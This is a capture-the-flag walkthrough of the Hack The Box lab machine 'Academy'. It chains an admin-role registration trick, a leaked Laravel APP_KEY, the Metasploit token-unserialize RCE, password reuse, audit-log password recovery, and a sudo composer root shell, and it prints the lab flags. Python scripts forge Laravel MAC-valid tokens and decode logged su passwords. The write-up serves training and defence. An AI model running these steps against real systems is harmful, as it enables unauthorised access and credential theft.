Academy(HTB)
Take down this machine in 24 hours.
ACADEMY
Add hosts
#/etc/hosts
10.10.10.215 academy.htb
Nmap
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 62
80/tcp open http syn-ack ttl 62
95/tcp filtered supdup no-response
1827/tcp filtered pcm host-unreach from 10.10.14.1 ttl 63
1944/tcp filtered close-combat host-unreach from 10.10.14.1 ttl 63
4019/tcp filtered talarian-mcast5 no-response
5791/tcp filtered unknown no-response
7109/tcp filtered unknown no-response
7284/tcp filtered unknown host-unreach from 10.10.14.1 ttl 63
8602/tcp filtered unknown no-response
9888/tcp filtered cyborg-systems host-unreach from 10.10.14.1 ttl 63
9999/tcp open abyss syn-ack ttl 62
11369/tcp filtered unknown host-unreach from 10.10.14.1 ttl 63
11397/tcp filtered unknown host-unreach from 10.10.14.1 ttl 63
16401/tcp filtered unknown no-response
17087/tcp filtered unknown no-response
17501/tcp filtered unknown host-unreach from 10.10.14.1 ttl 63
18429/tcp filtered unknown host-unreach from 10.10.14.1 ttl 63
19682/tcp filtered unknown no-response
22574/tcp filtered unknown no-response
Directory brute force
[200][text/html; charset=UTF-8][968.00b] http://academy.htb/admin.php
[200][text/html; charset=UTF-8][0b] http://academy.htb/config.php
[200][text/html; charset=UTF-8][716.00b] http://academy.htb/index.php
[200][text/html; charset=UTF-8][716.00b] http://academy.htb/index.php/login/
[200][text/html; charset=UTF-8][964.00b] http://academy.htb/login.php
[200][text/html; charset=UTF-8][1001.00b] http://academy.htb/register.php
[200][image/svg+xml][5.14kb] http://academy.htb/images/logo.svg
[200][text/html; charset=UTF-8][964.00b] http://academy.htb//login.php
[200][text/html; charset=UTF-8][1001.00b] http://academy.htb//register.php
Register
POST /register.php HTTP/1.1
Host: academy.htb
Content-Length: 49
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://academy.htb
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://academy.htb/register.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=c9cqdl7n1t1s1ai4g2slian339; ajs_anonymous_id=%2295c634d6-5be3-453e-89ac-b11b7d262590%22; _fbp=fb.1.1604838364440.194187982
Connection: close
uid=admin&password=admina&confirm=admina&roleid=1 # set roleid to 1 to register an admin account: the role is taken from the client-supplied form field, so any visitor can register as admin
Login
http://academy.htb/admin-page.php
Academy Launch Planner

| Item | Status |
| --- | --- |
| Complete initial set of modules (cry0l1t3 / mrb3n) | done |
| Finalize website design | done |
| Test all modules | done |
| Prepare launch campaign | done |
| Separate student and admin roles | done |
| Fix issue with dev-staging-01.academy.htb | pending |
Add hosts again
#/etc/hosts
10.10.10.215 dev-staging-01.academy.htb
Visit dev-staging-01.academy.htb
UnexpectedValueException
The stream or file "/var/www/html/htb-academy-dev-01/storage/logs/laravel.log" could not be opened in append mode: failed to open stream: Permission denied
Find sensitive information: the app runs with APP_DEBUG=true, so the Laravel error page dumps the whole environment (server variables and the .env values). The useful parts:
SERVER_ADMIN "admin@htb"
# ...
APP_NAME "Laravel"
APP_ENV "local"
APP_KEY "base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=" #interesting
APP_DEBUG "true" # this is what exposes the rest
APP_URL "http://localhost"
LOG_CHANNEL "stack"
DB_CONNECTION "mysql"
DB_HOST "127.0.0.1"
DB_PORT "3306"
DB_DATABASE "homestead"
DB_USERNAME "homestead"
DB_PASSWORD "secret" #interesting
BROADCAST_DRIVER "log"
CACHE_DRIVER "file"
SESSION_DRIVER "file"
SESSION_LIFETIME "120"
QUEUE_DRIVER "sync"
REDIS_HOST "127.0.0.1"
REDIS_PASSWORD "null"
REDIS_PORT "6379"
MAIL_DRIVER "smtp"
MAIL_HOST "smtp.mailtrap.io"
MAIL_PORT "2525"
MAIL_USERNAME "null"
MAIL_PASSWORD "null"
MAIL_ENCRYPTION "null"
Find a vuln
# https://www.exploit-db.com/exploits/47129 (Metasploit module description):
This module exploits a vulnerability in the PHP Laravel Framework for versions 5.5.40, 5.6.x <= 5.6.29.
Remote Command Execution is possible via a correctly formatted HTTP X-XSRF-TOKEN header, due to
an insecure unserialize call of the decrypt method in Illuminate/Encryption/Encrypter.php.
Authentication is not required, however exploitation requires knowledge of the Laravel APP_KEY.
Similar vulnerabilities appear to exist within Laravel cookie tokens based on the code fix.
In some cases the APP_KEY is leaked which allows for discovery and exploitation.
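Why the leaked APP_KEY is enough, as an added example that is not code from this writeup or from the Laravel project: Laravel's Encrypter wraps the AES-256-CBC output in a JSON envelope whose only integrity check is an HMAC-SHA256 computed with the same APP_KEY. The script below reproduces that envelope and the validMac() gate, so you can see that anyone holding the key can build a token the server accepts and passes on to unserialize(). The AES step and the PHP gadget chain are deliberately not reproduced: the ciphertext bytes are a constructed placeholder, and the function names are my own.

```python
import base64
import hashlib
import hmac
import json
import os

# APP_KEY leaked by the debug page above. Laravel strips the "base64:" prefix
# and base64-decodes the rest to obtain the raw 32-byte AES-256-CBC key; the
# very same key is used for the HMAC that protects the ciphertext.
APP_KEY = "base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0="


def raw_key(app_key):
    """Mirror of how Laravel turns config('app.key') into key bytes."""
    if app_key.startswith("base64:"):
        return base64.b64decode(app_key[len("base64:"):])
    return app_key.encode()


def laravel_mac(key, iv_b64, value_b64):
    """Encrypter::hash(): hash_hmac('sha256', $iv . $value, $key), computed
    over the two base64 strings exactly as they appear in the JSON payload."""
    return hmac.new(key, (iv_b64 + value_b64).encode(), hashlib.sha256).hexdigest()


def build_payload(app_key, ciphertext, iv=None):
    """Assemble the outer token the way Encrypter::encrypt() does:
    base64(json({"iv": b64(iv), "value": b64(ciphertext), "mac": hmac})).
    `ciphertext` stands in for the AES-256-CBC output of the serialized
    object (constructed bytes here; the cipher step is not reproduced)."""
    iv = iv if iv is not None else os.urandom(16)
    iv_b64 = base64.b64encode(iv).decode()
    value_b64 = base64.b64encode(ciphertext).decode()
    payload = {
        "iv": iv_b64,
        "value": value_b64,
        "mac": laravel_mac(raw_key(app_key), iv_b64, value_b64),
    }
    return base64.b64encode(json.dumps(payload).encode()).decode()


def payload_passes_mac(app_key, token):
    """Replicates Encrypter::getJsonPayload(): base64 + JSON decode, field
    and IV-length checks, then validMac(). In the affected versions this is
    the only gate before the decrypted value reaches unserialize()."""
    try:
        payload = json.loads(base64.b64decode(token))
    except (ValueError, TypeError):
        return False
    if not isinstance(payload, dict):
        return False
    if not all(isinstance(payload.get(k), str) for k in ("iv", "value", "mac")):
        return False
    try:
        if len(base64.b64decode(payload["iv"], validate=True)) != 16:  # AES-CBC IV
            return False
    except (ValueError, TypeError):
        return False
    expected = laravel_mac(raw_key(app_key), payload["iv"], payload["value"])
    return hmac.compare_digest(expected.encode(), payload["mac"].encode())


def tamper_value(token):
    """Flip one byte of the ciphertext field without touching the MAC: this is
    all an attacker who does NOT hold APP_KEY can do, and it must be rejected."""
    payload = json.loads(base64.b64decode(token))
    ct = bytearray(base64.b64decode(payload["value"]))
    ct[0] ^= 0x01
    payload["value"] = base64.b64encode(bytes(ct)).decode()
    return base64.b64encode(json.dumps(payload).encode()).decode()


if __name__ == "__main__":
    forged = build_payload(APP_KEY, b"\x00" * 32)  # arbitrary "ciphertext", valid MAC
    print("forged token passes MAC check:", payload_passes_mac(APP_KEY, forged))
    print("tampered token passes MAC check:", payload_passes_mac(APP_KEY, tamper_value(forged)))
```

The practical consequence is the one the module description states: the key is the whole secret, so an APP_KEY exposed by a debug page, a committed .env or a backup must be rotated, and rotating it also invalidates every cookie and session issued under it.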
RCE!
msfconsole
use unix/http/laravel_token_unserialize_exec
set rhost 10.10.10.215
set vhost dev-staging-01.academy.htb
run
Get a reverse shell
Get www-data
ls /home/* -la
/home/21y4d:
total 20
drwxr-xr-x 2 21y4d 21y4d 4096 Aug 10 00:34 .
drwxr-xr-x 8 root root 4096 Aug 10 00:34 ..
-rw-r--r-- 1 21y4d 21y4d 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 21y4d 21y4d 3771 Feb 25 2020 .bashrc
-rw-r--r-- 1 21y4d 21y4d 807 Feb 25 2020 .profile
/home/ch4p:
total 20
drwxr-xr-x 2 ch4p ch4p 4096 Aug 10 00:34 .
drwxr-xr-x 8 root root 4096 Aug 10 00:34 ..
-rw-r--r-- 1 ch4p ch4p 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 ch4p ch4p 3771 Feb 25 2020 .bashrc
-rw-r--r-- 1 ch4p ch4p 807 Feb 25 2020 .profile
/home/cry0l1t3:
total 332
drwxr-xr-x 6 cry0l1t3 cry0l1t3 4096 Nov 8 22:18 .
drwxr-xr-x 8 root root 4096 Aug 10 00:34 ..
lrwxrwxrwx 1 root root 9 Aug 10 23:41 .bash_history -> /dev/null
-rw-r--r-- 1 cry0l1t3 cry0l1t3 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 cry0l1t3 cry0l1t3 3771 Feb 25 2020 .bashrc
drwx------ 2 cry0l1t3 cry0l1t3 4096 Aug 12 21:58 .cache
drwx------ 4 cry0l1t3 cry0l1t3 4096 Nov 8 19:56 .gnupg
drwxrwxr-x 3 cry0l1t3 cry0l1t3 4096 Aug 12 02:30 .local
-rw------- 1 cry0l1t3 cry0l1t3 160 Nov 8 22:18 .mysql_history
-rw-r--r-- 1 cry0l1t3 cry0l1t3 807 Feb 25 2020 .profile
-rw------- 1 cry0l1t3 cry0l1t3 1028 Nov 8 16:02 .viminfo
-rwxr-xr-x 1 cry0l1t3 cry0l1t3 288470 Nov 8 19:56 linpeas.sh #interesting
drwxr-xr-x 3 cry0l1t3 cry0l1t3 4096 Nov 8 19:56 snap
-r--r----- 1 cry0l1t3 cry0l1t3 33 Nov 8 15:25 user.txt #interesting
/home/egre55:
total 24
drwxr-xr-x 3 egre55 egre55 4096 Aug 10 23:41 .
drwxr-xr-x 8 root root 4096 Aug 10 00:34 ..
lrwxrwxrwx 1 root root 9 Aug 10 23:41 .bash_history -> /dev/null
-rw-r--r-- 1 egre55 egre55 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 egre55 egre55 3771 Feb 25 2020 .bashrc
drwx------ 2 egre55 egre55 4096 Aug 7 12:13 .cache
-rw-r--r-- 1 egre55 egre55 807 Feb 25 2020 .profile
-rw-r--r-- 1 egre55 egre55 0 Aug 7 12:14 .sudo_as_admin_successful #interesting
/home/g0blin:
total 20
drwxr-xr-x 2 g0blin g0blin 4096 Aug 10 00:34 .
drwxr-xr-x 8 root root 4096 Aug 10 00:34 ..
-rw-r--r-- 1 g0blin g0blin 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 g0blin g0blin 3771 Feb 25 2020 .bashrc
-rw-r--r-- 1 g0blin g0blin 807 Feb 25 2020 .profile
/home/mrb3n:
total 32
drwxr-xr-x 5 mrb3n mrb3n 4096 Nov 8 18:51 .
drwxr-xr-x 8 root root 4096 Aug 10 00:34 ..
lrwxrwxrwx 1 root root 9 Aug 10 23:41 .bash_history -> /dev/null
-rw-r--r-- 1 mrb3n mrb3n 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 mrb3n mrb3n 3771 Feb 25 2020 .bashrc
drwxrwxr-x 3 mrb3n mrb3n 4096 Oct 21 10:55 .cache
drwxrwxr-x 3 mrb3n mrb3n 4096 Aug 12 22:19 .config
drwxrwxr-x 3 mrb3n mrb3n 4096 Aug 12 22:19 .local
-rw-r--r-- 1 mrb3n mrb3n 807 Feb 25 2020 .profile
run /home/cry0l1t3/linpeas.sh
/var/www/html/academy/.env.example:DB_PASSWORD=secret
/var/www/html/academy/.env.example:MAIL_PASSWORD=null
/var/www/html/academy/.env.example:REDIS_PASSWORD=null
/var/www/html/academy/.env:DB_PASSWORD=mySup3rP4s5w0rd!! #interesting
/var/www/html/academy/.env:MAIL_PASSWORD=null
/var/www/html/academy/.env:REDIS_PASSWORD=null
Get User
The DB_PASSWORD from the production .env is reused as cry0l1t3's login password:
ssh cry0l1t3@10.10.10.215
mySup3rP4s5w0rd!!
$ cat user.txt
1488358ab64c0b5071a372bf91c277c8
Get Root
cry0l1t3 isn't in sudoers, but is in the adm group, which can read the logs under /var/log, including the audit log:
uid=1002(cry0l1t3) gid=1002(cry0l1t3) groups=1002(cry0l1t3),4(adm)
egre55 would be the obvious target (sudo and lxd groups), but no credentials for that account have turned up:
uid=1000(egre55) gid=1000(egre55) groups=1000(egre55),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)
Running linpeas as cry0l1t3 instead finds a password typed at a su prompt, recorded by pam_tty_audit in the audit log:
[+] Checking for TTY (sudo/su) passwords in logs
Error opening config file (Permission denied)
NOTE - using built-in logs: /var/log/audit/audit.log
1. 08/12/2020 02:28:10 83 0 ? 1 sh "su mrb3n",<nl>
2. 08/12/2020 02:28:13 84 0 ? 1 su "mrb3n_Ac@d3my!",<nl>
/var/log/audit/audit.log.3:type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=1002 auid=0 ses=1 major=4 minor=1 comm="su" data=6D7262336E5F41634064336D79210A
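What linpeas and aureport did above, as an added example that is not part of the original writeup: pam_tty_audit stores keystrokes hex-encoded in the data= field of type=TTY records, so anyone who can read /var/log/audit can recover whatever was typed at a su or sudo prompt. The script parses such records, decodes them, and pairs a `su <user>` typed into a shell with the keystrokes su itself received next. The sample log is constructed from the lines on this page: the su record is the audit.log.3 line quoted above, the sh record is rebuilt from the aureport summary (pid 2517 and the exact timestamp are made up), and the SYSCALL line is there only to show non-TTY records being ignored.

```python
import re

# Fields we need from a type=TTY record (pam_tty_audit output in audit.log).
TTY_RE = re.compile(
    r'type=TTY msg=audit\((?P<ts>\d+)\.\d+:(?P<serial>\d+)\):'
    r'.*?\bpid=(?P<pid>\d+) uid=(?P<uid>\d+) auid=(?P<auid>\d+)'
    r'.*?comm="(?P<comm>[^"]*)" data=(?P<data>[0-9A-Fa-f]+)'
)

# Constructed sample (see lead-in): one unrelated record, the shell typing
# "su mrb3n", then su receiving the password.
SAMPLE_LOG = """\
type=SYSCALL msg=audit(1597199290.101:82): arch=c000003e syscall=59 success=yes exit=0 comm="sh"
type=TTY msg=audit(1597199290.531:83): tty pid=2517 uid=1002 auid=0 ses=1 major=4 minor=1 comm="sh" data=7375206D7262336E0A
type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=1002 auid=0 ses=1 major=4 minor=1 comm="su" data=6D7262336E5F41634064336D79210A
"""

SHELLS = ("sh", "bash", "dash", "zsh")


def parse_tty_records(log_text):
    """Return one dict per type=TTY record with the data field hex-decoded.
    Decoding is lenient on purpose: pam_tty_audit logs raw bytes, so control
    characters and partial UTF-8 sequences (arrow keys, backspaces) occur."""
    records = []
    for line in log_text.splitlines():
        m = TTY_RE.search(line)
        if not m:
            continue
        raw = bytes.fromhex(m.group("data"))
        records.append({
            "ts": int(m.group("ts")),
            "serial": int(m.group("serial")),
            "pid": int(m.group("pid")),
            "uid": int(m.group("uid")),
            "comm": m.group("comm"),
            "keystrokes": raw.decode("utf-8", errors="replace"),
        })
    return records


def find_su_passwords(records):
    """Pair an `su [opts] <user>` command typed into a shell with the next
    keystroke record attributed to su itself: that record is the answer to
    the password prompt. A bare `su` or `su -` targets root."""
    found = []
    pending_user = None
    for r in sorted(records, key=lambda r: (r["ts"], r["serial"])):
        text = r["keystrokes"].strip("\r\n")
        words = text.split()
        if r["comm"] in SHELLS and words and words[0] == "su":
            args = [a for a in words[1:] if not a.startswith("-")]
            pending_user = args[0] if args else "root"
        elif r["comm"] == "su" and pending_user is not None:
            found.append((pending_user, text))
            pending_user = None
    return found


if __name__ == "__main__":
    for user, password in find_su_passwords(parse_tty_records(SAMPLE_LOG)):
        print(f"su {user}: {password!r}")
```

The lesson for the defender is the one this box turns on: enabling pam_tty_audit with log_passwd (or leaving the audit log readable by a broad group such as adm) turns the audit trail itself into a credential store.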
Use composer to elevate privileges: mrb3n can run composer through sudo (the run below succeeds as root), and the GTFOBins composer entry abuses run-script, which executes whatever shell command a composer.json script entry names, as the user running composer:
TF=$(mktemp -d)
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
composer --working-dir=$TF run-script x
sudo composer --working-dir=/tmp/tmp.3fjC6bZwMf run-script x
[sudo] password for mrb3n:
PHP Warning: PHP Startup: Unable to load dynamic library 'mysqli.so' (tried: /usr/lib/php/20190902/mysqli.so (/usr/lib/php/20190902/mysqli.so: undefined symbol: mysqlnd_global_stats), /usr/lib/php/20190902/mysqli.so.so (/usr/lib/php/20190902/mysqli.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
PHP Warning: PHP Startup: Unable to load dynamic library 'pdo_mysql.so' (tried: /usr/lib/php/20190902/pdo_mysql.so (/usr/lib/php/20190902/pdo_mysql.so: undefined symbol: mysqlnd_allocator), /usr/lib/php/20190902/pdo_mysql.so.so (/usr/lib/php/20190902/pdo_mysql.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
Do not run Composer as root/super user! See https://getcomposer.org/root for details
> /bin/sh -i 0<&3 1>&3 2>&3
# whoami
root
# bash
root@academy:/tmp/tmp.rMwFLB8jVl# cat /root/root.txt
f914bdf4c87e4ec6e7f7fe5afb053155